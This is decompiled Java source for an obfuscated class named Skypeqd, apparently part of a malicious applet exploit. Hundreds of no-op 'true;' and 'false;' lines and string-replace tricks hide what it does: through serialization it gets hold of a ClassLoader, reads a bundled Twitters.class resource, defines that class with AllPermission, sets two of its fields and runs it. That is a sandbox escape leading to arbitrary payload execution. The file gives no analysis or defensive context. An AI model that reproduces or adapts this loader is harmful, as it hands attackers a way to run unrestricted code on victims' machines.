// 
// Decompiled by Procyon v0.5.30
// 

package quote;

import java.security.Permission;
import java.security.AllPermission;
import java.security.PermissionCollection;
import java.security.ProtectionDomain;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.cert.Certificate;
import java.net.URL;
import java.lang.reflect.Field;
import java.io.InputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Skypeqd extends ClassLoader implements Serializable
{
    public static Skypeqd instance;
    private static final long serialVersionUID = 6812622870313961944L;
    
    private void writeObject(final ObjectOutputStream objectOutputStream) throws IOException, ClassNotFoundException {
        false;
        true;
        true;
        true;
        false;
        false;
        true;
        objectOutputStream.defaultWriteObject();
        false;
        true;
        true;
        true;
        false;
    }
    
    private void readObject(final ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {
        true;
        false;
        false;
        false;
        false;
        true;
        false;
        Skypeqd.instance = this;
        false;
        true;
        false;
        true;
        true;
        false;
        true;
        objectInputStream.defaultReadObject();
        false;
        true;
        true;
        false;
        false;
        true;
        true;
        true;
        false;
        false;
        true;
        false;
        false;
        true;
        true;
    }
    
    public void __t(final String s, final String s2) throws IOException {
        false;
        false;
        false;
        true;
        false;
        true;
        true;
        true;
        false;
        true;
        true;
        false;
        false;
        false;
        true;
        true;
        true;
        false;
        true;
        final int n = 8192;
        true;
        true;
        false;
        false;
        false;
        true;
        false;
        true;
        false;
        false;
        false;
        false;
        false;
        false;
        false;
        false;
        true;
        true;
        true;
        true;
        false;
        false;
        false;
        true;
        false;
        try {
            false;
            false;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            true;
            true;
            true;
            true;
            false;
            false;
            false;
            false;
            false;
            false;
            false;
            true;
            true;
            final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            true;
            false;
            false;
            false;
            true;
            false;
            false;
            false;
            true;
            final byte[] array = new byte[n];
            false;
            false;
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
            false;
            false;
            false;
            final String replace = "quote".replace("_", "").replace("gggg.ggg".replace("g", ""), "a/".replace("a", ""));
            false;
            true;
            true;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
            true;
            true;
            true;
            true;
            true;
            true;
            false;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            final InputStream resourceAsStream = this.getClass().getResourceAsStream("/qqq".replace("q", "") + replace + "/Tw____itt__ers__.___c_la___s_s".replace("_", ""));
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            true;
            false;
            true;
            false;
            true;
            false;
            true;
            true;
            false;
            true;
            true;
            true;
            false;
            int read;
            while ((read = resourceAsStream.read(array)) > 0) {
                true;
                true;
                true;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                true;
                true;
                false;
                true;
                true;
                true;
                byteArrayOutputStream.write(array, 0, read);
                false;
                false;
                true;
                true;
                false;
                true;
                true;
                false;
                true;
                false;
                true;
                true;
                false;
            }
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            true;
            true;
            final byte[] byteArray = byteArrayOutputStream.toByteArray();
            false;
            true;
            false;
            false;
            true;
            false;
            true;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            true;
            false;
            final Class minitClass = this.minitClass(byteArray);
            false;
            false;
            false;
            false;
            false;
            true;
            true;
            true;
            false;
            false;
            false;
            false;
            true;
            false;
            true;
            false;
            false;
            if (minitClass != null) {
                false;
                false;
                true;
                true;
                true;
                true;
                false;
                false;
                false;
                false;
                false;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                false;
                true;
                false;
                false;
                false;
                final Field field = minitClass.getField("xxcxc".replace("x", ""));
                false;
                false;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                final Field field2 = minitClass.getField("dcacccta".replace("c", ""));
                false;
                true;
                true;
                false;
                true;
                false;
                true;
                false;
                true;
                false;
                true;
                false;
                true;
                true;
                false;
                false;
                false;
                false;
                false;
                true;
                false;
                false;
                final Object instance = minitClass.newInstance();
                false;
                true;
                false;
                false;
                false;
                false;
                false;
                false;
                false;
                true;
                false;
                false;
                true;
                false;
                true;
                false;
                true;
                false;
                field.set(instance, s2);
                false;
                false;
                false;
                false;
                false;
                true;
                false;
                false;
                true;
                false;
                field2.set(instance, s);
                false;
                true;
                false;
                true;
                false;
                false;
                false;
                true;
                true;
                false;
                false;
                false;
                true;
                false;
                true;
                false;
                minitClass.newInstance();
                true;
                true;
                false;
                true;
                true;
                true;
                true;
                true;
                true;
                true;
            }
            true;
            false;
            false;
            false;
            false;
            false;
            true;
            true;
            false;
            false;
            false;
            false;
            false;
        }
        catch (Exception ex) {
            true;
            true;
            true;
            true;
            true;
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            true;
            true;
        }
        false;
        false;
        true;
        false;
        false;
        true;
        true;
        true;
        false;
        true;
        true;
        true;
        false;
        true;
        false;
        true;
        false;
        false;
        false;
        false;
        true;
    }
    
    public Class minitClass(final byte[] array) throws IOException {
        true;
        false;
        true;
        true;
        false;
        true;
        true;
        true;
        true;
        true;
        false;
        true;
        true;
        false;
        true;
        final int n = 0;
        true;
        true;
        true;
        true;
        true;
        true;
        true;
        true;
        false;
        false;
        false;
        true;
        true;
        true;
        false;
        false;
        false;
        final String replace = "fikkle://kkkkk/".replace("k", "");
        true;
        true;
        true;
        true;
        false;
        true;
        false;
        false;
        true;
        final URL url = new URL(replace);
        false;
        false;
        false;
        false;
        false;
        false;
        true;
        false;
        false;
        false;
        true;
        false;
        false;
        false;
        true;
        false;
        true;
        final Certificate[] array2 = new Certificate[n];
        false;
        true;
        false;
        true;
        final Permissions permissions = new Permissions();
        false;
        true;
        true;
        false;
        true;
        true;
        false;
        true;
        false;
        false;
        true;
        true;
        false;
        false;
        true;
        true;
        true;
        this.AddPerm(permissions);
        false;
        false;
        false;
        false;
        true;
        false;
        true;
        true;
        false;
        false;
        true;
        false;
        false;
        false;
        false;
        false;
        final CodeSource codeSource = new CodeSource(url, array2);
        true;
        false;
        true;
        true;
        false;
        false;
        true;
        true;
        true;
        false;
        true;
        true;
        true;
        true;
        false;
        true;
        true;
        true;
        false;
        final ProtectionDomain protectionDomain = new ProtectionDomain(codeSource, permissions);
        false;
        true;
        false;
        false;
        true;
        true;
        true;
        true;
        true;
        false;
        true;
        true;
        true;
        true;
        return this.defineClass("quote.Twitters", array, n, array.length, protectionDomain);
    }
    
    public void AddPerm(final Permissions permissions) {
        permissions.add(new AllPermission());
    }
    
    static {
        Skypeqd.instance = null;
    }
}
